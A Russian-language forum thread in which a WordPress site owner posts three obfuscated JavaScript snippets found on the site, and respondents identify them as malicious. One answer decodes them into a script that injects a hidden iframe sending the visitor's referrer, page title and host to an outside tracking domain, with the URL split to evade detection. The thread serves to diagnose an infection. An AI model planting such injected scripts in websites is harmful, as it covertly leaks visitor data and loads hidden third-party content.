@Chekhoved

Данный скрипт — вирус?

Есть подозрение на наличие вредоносных скриптов на сайте WordPress
182096d591d54b23ac049268b663243f.jpg

Перевод:
Этот файл, как представляется, установлен хакером для выполнения вредоносных действий. Если вы знаете о этом файле вы можете выбрать, чтобы игнорировать его, чтобы исключить его из будущих проверок. Текст, который мы нашли в этом файле, который соответствует известной вредоносный файл является: "1Aqapkrv".

Вот скрипты. Это вирус?
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00cn'00'02)'02'00ac'00'02)'02'00pfk'00'02)'02'00c,n,a'00'02)'02'00mpgfk'00'02)'02'00qvpk`w'00'02)'02'00vg,'00'02)'02'00am'00'02)'02'00o'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>a


Если нет, что он делает?
  • Вопрос задан
  • 1336 просмотров
Решения вопроса 2
DIITHiTech
@DIITHiTech
Fullstack javascript developer
Ну ничего хорошего тут точно нет, кроме как вставки iframe
<script type="text/javascript">
	var referer = encodeURIComponent(document.referrer);
	var default_keyword = encodeURIComponent(document.title);
	var host = encodeURIComponent(location.host);
	var iframe = document.createElement('iframe');
	iframe.width=0;
	iframe.height=0;
	iframe.src= "h" + "tt" + "p://" + "c11n4." + "i.te" + "as" + "erg" + "uid" + "e.c" + "om" + "/snitch?d" + "ef" + "aul" + "t_k" + "ey" + "word=" + default_keyword + "&refe" + "rrer=" + referer + "&se_r" + "ef" + "er" + "rer=" + referer + "&sou" + "rce=" + host;
	document.body.appendChild(iframe);
</script>

еще и разбили url дабы не обнаруживался. c11n4.i.teaserguide.com/snitch?default_keyword=Tes...
Ответ написан
Комментировать
Punkie
@Punkie
Вероятнее всего. Обычно через unescape как раз всякие порно-баннеры внедряют либо снифферы форм.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы